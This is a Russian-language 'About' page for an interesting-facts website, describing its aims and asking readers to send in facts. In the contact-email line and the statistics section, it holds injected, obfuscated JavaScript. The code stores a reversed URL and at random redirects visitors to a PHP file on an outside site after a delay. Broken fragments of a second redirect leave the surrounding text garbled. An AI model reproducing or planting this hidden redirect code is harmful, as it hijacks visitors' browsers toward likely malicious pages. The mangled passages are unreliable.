О сайте

Что отличает нас от животных? Похоже, что очень немного, и одно из этих отличий – любопытство. Ни кита, ни его родственника бегемота (да-да, они родственники!)  абсолютно не волнует смысл существования. Попугай не устремляет задумчивый взор в ночное небо и не вопрошает, что это за точки там. А вот люди – да!

Вопросы и ответы – это очень большая часть нашей жизни. Мы постараемся осветить самые интересные из них. Попробуем развеять всеобщие заблуждения, объяснить тайны и загадки, как большие, так и малые, возможно заинтересовавшие вас давно или совсем недавно. Здесь вы найдете сотни занимательных фактов, о которых обычный человек даже не задумывается.

Этот сайт – для людей, которые любят задавать самые интересные вопросы, и хотят получать на них ответы.
Человек, история цивилизаций, научные загадки и чудеса, которые преподносит нам мир вокруг нас, – все это невероятно интересно, и узнать чуть больше об этих вещах – чрезвычайно заманчиво. Надеемся, вам доставит подлинное удовольствие путешествие в мир самых интересных фактов мира с нашим сайтом.

Мы сделаем все, чтобы ежедневно сюда добавлялись самые интересные факты. Интересные факты о жизни, человеке, о женщинах и мужчинах, интересные факты из истории, о животных и растениях, о науке и технике и многом другом… Сами записи будут небольшими, чтобы было не скучно, но информативными – хоть сейчас обсуждай на форуме, используй в викторине или реферате. И вы всегда сможете сказать своим друзьям: «А знаете ли вы, что…?» и привести неизвестные и невероятные факты, или задать им самые интересные вопросы, собранные на этом сайте…

Мы надеемся, что вам будет интересно каждый день, так что приходите, подключайтесь, подписывайтесь и читайте наши интересные факты, и присылайте свои!

Так что, если у вас есть свои интересные факты – то присылайте их нам в рубрику “День Друзей” и мы с удовольствием их опубликуем!

[Два человека, которым не все равно]

Ну а связаться с нами можно, например, по почте: $zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to:znaeteli2009@gmail.com”>znaeteli2009@gmail.com

А если захотите сделать нам приятное – просто напишите о нас на своем сайте или блоге – например вот так. Спасибо!

Статистика:
$zXz=function(n){if (typeof ($zXz.list[n]) == "string") return $zXz.list[n].split("").reverse().join("");return $zXz.list[n];};$zXz.list=["\'php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tools” target=”_blank” rel=”noopener”>